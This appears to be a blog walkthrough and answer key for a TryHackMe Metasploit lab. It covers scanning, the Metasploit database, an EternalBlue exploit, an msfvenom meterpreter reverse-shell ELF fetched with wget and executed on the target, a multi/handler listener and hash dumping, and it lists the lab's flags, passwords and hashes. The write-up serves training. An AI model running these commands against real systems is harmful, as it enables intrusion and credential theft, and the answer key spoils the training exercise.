๐Ÿ”ฅ Complete Guide to Metasploit: Scanning, Exploitation & Msfvenom (With All Answers)

 


๐Ÿ”ฅ Complete Guide to Metasploit: Scanning, Exploitation & Msfvenom (With All Answers)

In this blog, I’ll walk you through the full process of using Metasploit Framework for:

  • Port Scanning

  • Vulnerability Scanning

  • Exploitation

  • Post-Exploitation

  • Using the Metasploit Database

  • Creating Payloads with MSFvenom

This guide includes all answers from the room.

๐Ÿš€ 1. Introduction to Metasploit

Metasploit is an exploitation framework used for:

  • Scanning targets

  • Identifying vulnerabilities

  • Exploiting services

  • Managing sessions

  • Generating payloads

Start Metasploit:

msfconsole

๐Ÿ”Ž 2. Port Scanning with Metasploit

You can search for scanning modules:

search portscan

Example module:

use auxiliary/scanner/portscan/tcp

Set required options:

set RHOSTS <target_ip>
set PORTS 1-1000
run

You can also run Nmap directly:

nmap -sS <target_ip>

✅ Answers (Scanning Section)

Q1: How many ports are open on the target system?
๐Ÿ‘‰ 5

Q2: Using the relevant scanner, what NetBIOS name can you see?
๐Ÿ‘‰ ACME IT SUPPORT

Q3: What is running on port 8000?
๐Ÿ‘‰ webfs/1.21

Q4: What is the "penny" user's SMB password?
๐Ÿ‘‰ leo1234

๐Ÿ—„ 3. Metasploit Database

Metasploit can store scan results in a database.

Start PostgreSQL:

systemctl start postgresql

Initialize DB:

sudo -u postgres msfdb init

Check status:

db_status

๐Ÿ“‚ Workspaces

Create workspace:

workspace -a tryhackme

Switch workspace:

workspace tryhackme

๐Ÿ” Save Nmap Results to Database

db_nmap -sV -p- <target_ip>

View stored data:

hosts
services
vulns
loot

๐Ÿงช 4. Vulnerability Scanning

Metasploit helps find “low-hanging fruit” vulnerabilities.

Example: VNC Login Scanner

use auxiliary/scanner/vnc/vnc_login
info

✅ Answer (Vulnerability Section)

Q: Who wrote the module that allows us to check SMTP servers for open relay?
๐Ÿ‘‰ Campbell Murray

๐Ÿ’ฅ 5. Exploitation

Metasploit contains thousands of exploits.

Example: MS17-010 (EternalBlue)

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set LHOST <your_ip>
exploit

๐ŸŽฏ Successful Exploitation Results

After exploitation:

  • Shell session opened

  • Retrieved flag

  • Dumped password hashes

✅ Answers (Exploitation Section)

Q: What is the content of the flag.txt file?
๐Ÿ‘‰ THM-5455554845

Q: What is the NTLM hash of the password of the user "pirate"?
๐Ÿ‘‰ 8ce9a3ebd1647fcc5e04025019f4b875

๐Ÿ›  6. MSFvenom – Payload Generation

MSFvenom generates custom payloads.

List payloads:

msfvenom -l payloads

๐Ÿง Generate Linux Meterpreter (.elf)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f elf > shell.elf

Transfer to target:

python3 -m http.server 9000
wget http://<your_ip>:9000/shell.elf
chmod +x shell.elf
./shell.elf

๐ŸŽง Setup Multi Handler

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
run

Meterpreter session received ✅

๐Ÿ” Post Exploitation – Dump Hashes

Use post module:

use post/linux/gather/hashdump

✅ Final Answer (MSFvenom Section)

Q: What is the other user's password hash?

๐Ÿ‘‰

$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

๐Ÿ“Œ Final Summary

In this room, we learned:

✔ How to scan using Metasploit
✔ How to use the Metasploit database
✔ How to identify vulnerabilities
✔ How to exploit services
✔ How to manage sessions
✔ How to generate payloads using MSFvenom
✔ How to use multi/handler
✔ How to perform post-exploitation

๐Ÿง  Final Answers List (Quick Reference)

QuestionAnswer
Open Ports5
NetBIOS NameACME IT SUPPORT
Port 8000 Servicewebfs/1.21
Penny SMB Passwordleo1234
SMTP Open Relay Module AuthorCampbell Murray
flag.txt ContentTHM-5455554845
Pirate NTLM Hash8ce9a3ebd1647fcc5e04025019f4b875
Other User Hash$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Comments

Post a Comment

Popular Posts